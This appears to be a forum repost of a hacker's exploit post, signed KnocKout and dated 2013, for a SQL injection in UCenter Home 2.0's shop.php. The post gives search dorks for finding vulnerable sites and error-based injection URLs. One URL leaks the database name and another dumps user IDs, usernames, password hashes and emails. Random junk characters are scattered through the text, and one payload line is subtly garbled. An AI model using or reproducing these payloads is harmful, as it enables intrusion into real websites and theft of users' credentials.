! ]. u( m, `3 }9 P$ W7 N% U
__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ b# v( K" H! {$ u- a
2 ~# X- N& [& }2 Y H
7 X! ~ ?9 e8 Y0 a7 ~3 G. R8 I/ K: f; l4 S* ]# \
*/ Author : KnocKout 6 [5 u- q9 t' @7 v7 A
* P5 b) Q- C4 U6 ]+ h5 ^ H& P*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
2 U! k! x0 W4 i/ y
* F/ ]: n+ f! W; H2 ~*/ Contact: knockoutr@msn.com . ]( l9 Z3 y: s3 f; n/ N3 Q8 @: I
8 u2 T6 `; M' e3 }" z+ F
*/ Cyber-Warrior.org/CWKnocKout
3 B% ^0 D9 G/ y
1 U& i$ L6 u0 L% J( F__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== / L" v; ~" k% I) {* }
! Y& w! Q& i: ^( M
Script : UCenter Home
0 i9 s! E& i+ K( d2 A
& B. k1 _9 u7 i+ m$ c+ g" V( gVersion : 2.0 8 k9 E( k6 Z/ b8 h0 r/ _( N! J
7 u6 g& k: f8 y
Script HomePage : http://u.discuz.net/
5 T" V* F- N' a% L8 C3 F: T6 n5 R, q4 u
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
' ^" J; s! p/ R, c. r2 `- @* k2 @8 A9 ^ s
Dork : Powered by UCenter inurl:shop.php?ac=view * [+ `" X" ]; E% q! B |+ [ u: Q
" D6 V% \% U/ |' X, _. s; lDork 2 : inurl:shop.php?ac=view&shopid= + A' f$ a! V% g9 F4 z$ ?
' z" E# B8 t+ _ b__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
) ]9 D- u, y4 w
9 L6 \+ D( ^7 \ n% ZVuln file : Shop.php % {4 G+ m, m" [( Z3 i; W! f
6 q1 M+ K5 W$ m% z8 t: J- f8 w
value's : (?)ac=view&shopid= 8 k& a. F- a4 j8 I' s# n1 x6 q
0 U4 V' O; g2 u9 c" x
Vulnerable Style : SQL Injection (MySQL Error Based)
; ]* }3 m" }* F8 w/ S% y& U# g. A
4 @# D3 s7 M. u* K) GNeed Metarials : Hex Conversion & ?1 h( ~" w) g/ W1 g( C9 e, O
0 c( q) c5 t3 l: Z, Q__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== , o: e+ x" Y% |, c f
. K- T' p8 |1 q3 x, q8 U" T# x
Your Need victim Database name. ! w/ o* P& C& C+ u4 N8 M2 \8 t
$ `7 ~; D" u9 ]4 n. R6 Pfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
4 V& O/ C3 c6 Z) u7 P1 j3 s; z
..
/ Y; H$ _* B- r1 P3 O+ [4 l
9 N0 i" d' O1 m. f: t3 I) f/ aDB : Okey. ( z) ?% i0 U+ x; a) E6 q7 w
8 ]3 \% d) o, l6 oyour edit DB `[TARGET DB NAME]`
3 B, M& k3 L. I$ t7 C6 n; w% x$ Z5 M* Z
Example : 'hiwir1_ucenter'
: d# M! R3 c7 \; \+ i* i) l: k( `% }- T) i3 C% z
Edit : Okey. " [: W* N9 o$ A$ q& J
4 ]% C3 T$ I0 Z) J: rYour use Hex conversion. And edit Your SQL Injection Exploit.. 0 t9 x2 w' \0 p
; v/ b; W/ ~8 b) u" |
n( D' r& P1 _2 q
. t+ L |2 }% E' o: e5 S' p! DExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 $ S+ k7 ?0 f$ b8 Z5 G y
|
发表于 2013-2-27 21:31:31
收藏
支持
反对